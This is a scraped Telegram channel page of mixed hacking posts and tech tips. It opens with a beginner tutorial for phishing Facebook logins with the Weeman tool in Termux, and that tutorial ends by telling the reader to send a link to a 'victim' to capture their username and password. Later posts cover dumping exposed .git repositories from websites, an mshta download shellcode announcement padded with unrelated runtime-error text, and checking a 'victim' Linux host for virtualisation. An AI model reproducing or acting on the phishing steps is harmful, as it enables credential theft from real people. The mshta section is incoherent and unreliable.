UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK FACEBOOK VIA TERMUX :
#ForBeginers :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) apt update && upgrade

Now give permission to Termux to access your memory
So type below command

2) termux-setup-storage

Then type this command to install python2

3) pkg install python2

During installation of python2 you will be asked " Termux will use some space"

4) Just type Y and hit enter
Now you have to install git, for that type this command

5) pkg install git

After successfully installing git, type below command to
6) install Weeman

7) git clone https://github.com/evait-security/weeman.git

After that type this command

8) cd weeman && ls

Now you have to type below command to run Weeman on Python

9) python2 weeman.py

Now you will see the Weeman user interface, its time to set all the necessary command

firstly you have to find your IP address, it is important so that you can find your IP address through termux

Just open a new tab on termux and type below command to see your IP

10) ifconfig

11) Now you got your IP address, now type below commands to get started

set url http://facebook.com
set action_url https://facebook.com
set port 8080

Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.

12) How To Hack Facebook Using Termux (Weeman)

If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command

run

Setting up weeman in termux

that's all you have successfully executed all the commands to hack Facebook

Now you have to share your IP with your victim to get his username and password

12) so send a link to your victim as http://Your_IP:8080

Eg: http://127.0.0.1:8080


#forbeginers
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravel’s cache.

You know by default Laravel uses the file cache driver. You want to use a speedier cache.

2) Use the Memcached cache driver.

Edit app/config/cache.php and change the driver to β€˜memcached’.

'driver' => 'memcached',
3) If you have multiple memcached servers, or they’re running on something other than the local machine, you’ll have to edit the memcached section of app/config/cache.php

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Musk recently used three little pigs to highlight his new brain-computer interface technology
#technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A #tool to dump a git repository from a website.

1) git clone https://github.com/arthaud/git-dumper.git?

2)cd git-dumper

3) pip install -r requirements.txt

4) ./git-dumper.py http://website.com/.git ~/website

F E A T U R E S :

-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);

-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;

-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;

-Fetch all objects recursively, analyzing each commits to find their parents;

-Run git checkout . to recover the current working tree

βœ…
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
48718.c
1.9 KB
#dangerous shellCode
β€” Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β€” Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β€” Tested on: WIN7x86
β€” Date: 2020-06-16
πŸ¦‘THE RECENT SHELLCODE HERE CAN USE MSHTA FOR AUTO DOWNLOAD WITHOUT AUTORIZATION...

- SO what is Mshta.exe
-How to Download Mshta.exe and Fix EXE Error Messages

1) EXE files such as mshta.exe are categorized as Win32 EXE (Executable application) files. As a Microsoft (R) HTML Application host file, it was created for use in Internet Explorer by Microsoft.

2) The release of mshta.exe introduced for Windows was on 11/08/2006 in Windows Vista. The most recent release for Microsoft Office Access 2010 14 launched on 07/04/2011 [version 11.00.16299.371 (WinBuild.160101.0800) release]. Mshta.exe is included in Windows 10, Windows 8.1, and Windows 8 versions.

mshta.exe Runtime Errors

3) Runtime errors are Microsoft Office Access 2010 errors that occur during "runtime". Runtime is pretty self-explanatory; it means that these EXE errors are triggered when mshta.exe is attempted to be loaded either when Microsoft Office Access 2010 is starting up, or in some cases already running. Runtime errors are the most common form of EXE error you will encounter using Microsoft Office Access 2010.

4) In most cases, mshta.exe runtime errors occurring while the program is running will result in the program terminating abnormally. Most of these mshta.exe error messages mean that Microsoft Office Access 2010 was either unable to locate this file on startup, or the file is corrupt, resulting in a prematurely-aborted startup process. Generally, Microsoft Office Access 2010 will be unable to start without resolving these errors.

by microsoft
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
Memory Injection like a Boss.pdf
331.5 KB
Forwarded from UNDERCODE NEWS
Tracking: A new generation of high-precision Beidou home-made positioning chip unveiled for high-precision positioning
#technologies
Support & Share β€οΈπŸ‘πŸ»

T.me/UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#infoguatering How can I check if the victim Linux
is a Linux system is running on a physical or virtual machine?

1) Check if the server is physical or virtual
The easiest way to check this is to use the dmidecode command.

> sudo dmidecode -s system-manufacturer


2) If it is a physical system, you should see the manufacturer's name such as Dell, Lenovo, etc.
If it's a virtual system, you should see output like QEMU, innotek Gmbh (for VirtualBox).

3) The dmidecode command is used to decode the computer's DMI information into a human readable format.

4) DMI, short for Desktop Management Interface, is a standard followed by (almost) all system manufacturers. DMI is used to manage and monitor components on a desktop, laptop, or server computer.

5) With DMI, you can get information about the system hardware, system manufacturer, and device serial number.

6) The dmidecode (DMI Decode) command retrieves this s system-manufacturer information and provides information about the system manufacturer.

7) If your system is real, you should see the manufacturer's name:

> destroyer@andreyex:~$ sudo dmidecode -s system-manufacturer

8) If it is a virtual machine, the information will be reflected accordingly.

> root@localhost:~# dmidecode -s system-manufacturer

9) It was fast, wasn't it? You can refer to the dmidecode command man page to see the keywords you can use to extract more information.

10) If you want to check the Linux version information, you will have to use the uname command, because dmidecode is all about hardware details.

Hopefully this article helped you determine if your Linux server is running in a virtual machine or a physical machine.

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Comprehensive Guide on Metasploitable 2.pdf
2.4 MB
#full Commands & pictures for beginers

Exploiting Port 22 SSH Bruteforce Port 22 SSH (RSA Method) Exploiting port 23 TELNET (Credential Capture) Exploiting TELNET (Bruteforce) Port 25 SMTP User Enumeration Exploiting Port 80 (PHP) Exploiting Port 139 & 445 (Samba) Exploiting Port 8080 (Java) Exploiting Port 5432 (Postgres) Exploiting Port 6667 (UnrealIRCD) Exploiting Port 36255 Remote Login Exploitation Remote Shell Exploitation Exploiting Port 8787 Bindshell Exploiting Port 5900 (VNC) Access Port 2121 (ProFTPD) Exploiting Port 8180 (Apache Tomcat) Privilege Escalation via NFS Exploiting Port 3306 (MYSQL)Network Scan Exploiting Port 21 FTP (Hydra) Exploiting VSFTPD 2.3.4
enjoyβ€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Best easy ways to reduce latency :

Solving latency issues
Latency is the time it takes to transfer data from client to server and back over available connections. High latency and / or low bandwidth results in low bandwidth, causing connectivity issues and latency.

Latency can occur anywhere between your local computer and the server, so it's important to consider both. Often times, the tactic you use for your local machine also works well for your server.

Remember, you cannot completely eliminate the delay. However, there are some easy ways to reduce latency, or at least identify its source.

1) Reboot
Warning, we're going to use the ugliest words in all of IT help ... have you turned it off and on again? Jokes aside, a reboot is important both locally and from a server perspective.

The network can slow down over time if not restarted. Locally, the cache of the modem or router gradually fills up and starts to get bogged down. In addition, sometimes a reboot of network servers is required.

2) Close programs that are limiting your bandwidth.
As explained above, latency and throughput are inextricably linked. If you are using near or even higher than the maximum bandwidth for your connection, it will increase latency.

3) Consider a wired connection.
Over time, technology has evolved towards wireless alternatives. Connecting to a network via an Ethernet cable can do wonders for connection speed if the latency occurs locally. This is very important when uploading or downloading large amounts of data to your local computer. It also has the added bonus of a simple and inexpensive fix. You won't find many wireless devices in server centers.

5) Review the location of data centers.
Depending on where your data is currently located, you can move it or add additional locations. If you can place your data closer to the user or the fetch point, you can dramatically reduce latency. Find out more about the location of our data centers on VPS.NET. With 24 locations around the world, you're sure to find the perfect destination.

6) Add CDN.
Content Delivery Networks (CDNs) can help you place copies of your data in many places. By creating multiple points of presence, your data can be cached for quick retrieval by those who access it regularly. CDNs can reduce latency as well as increase uptime. There are many CDNs available on the market. With a little research, you can find the perfect solution to your latency problem.

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁